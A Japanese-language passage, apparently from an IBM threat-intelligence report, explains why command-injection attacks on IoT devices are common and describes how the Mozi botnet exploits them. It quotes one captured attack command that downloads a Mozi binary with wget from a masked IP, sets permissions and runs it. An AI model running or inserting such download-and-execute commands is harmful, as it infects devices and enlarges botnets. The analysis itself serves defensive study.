IBMが観測したほぼすべてのIoTターゲットは、デバイスへの初期アクセスを得るためにCMDi攻撃を使用しようとしました。ターゲットのエンドポイントがIoTであり、これらの攻撃を受けやすい場合は、ペイロードがダウンロードされて実行されました。

CMDi攻撃がIoTデバイスに対して非常に一般的である理由には、いくつかあります。まず、IoT内蔵システムには、一般に悪用可能なWebインターフェースと、ファームウェア開発から残っているデバッグ・インターフェースが含まれています。第2に、IoT Webインターフェースに組み込まれたPHPモジュールを悪用して、悪意のある攻撃者にリモート実行機能を提供する可能性があります。そして第3に、IoTインターフェースは、管理者が予期されるリモート入力をサニタイズしてインターフェースを強化することを怠ったため、導入時に脆弱なままになることがよくあります。 これにより、脅威アクターは「wget」などのシェルコマンドを入力できます。

分析の結果、Moziボットネットが「wget」シェル・コマンドを使用し、その後脅威アクターが影響を受けるシステムと対話できるように権限を変更することでCMDiを活用していることが判明しました。例：

wget http://xxx.xx.xxx.xxx/bins/mozi.a-o /var/tmp/mozi.a;chmod 777 /var/tmp/mozi.a;rm -rf /var/tmp/mozi.a

ホストがCMDiに対して脆弱な場合、このコマンドは「mozi.a」というファイルをダウンロードして実行します。この特定のサンプルの分析では、ファイルはインターロック付きパイプライン・ステージ（MIPS）アーキテクチャーなしでマイクロプロセッサー上で実行されることが示されました。これは、多くの IoTデバイスで普及している、縮小命令セット・コンピューター（RISC）アーキテクチャーを実行するマシンによって理解される拡張機能です。攻撃者がボットネットを通じてデバイスに完全にアクセスすると、ファームウェア・レベルが変更され、追加のマルウェアがデバイスに仕掛けられる可能性があります。

この例ではよく知られたベクトルを挙げていますが、主な理由は2つあります。まず、新たな脆弱性により、CMDiを介したエクスプロイテーションの試みが継続的に更新され、パッチの実装の遅れが悪用される可能性があります。第2に、この活動は簡単に自動化できるため、脅威アクターは低コストで広範囲のデバイスを迅速に攻撃できるようになります。

Moziボットネット・インフラストラクチャーは主に中国で発生しており、観察されたインフラストラクチャーの84％を占めています。この事実は、2020年のIoTに関する他のオープンソースの研究と一致しています。

以下は、IBMが観察したMoziボットネットのエクスプロイトを試みる脆弱性のリストです。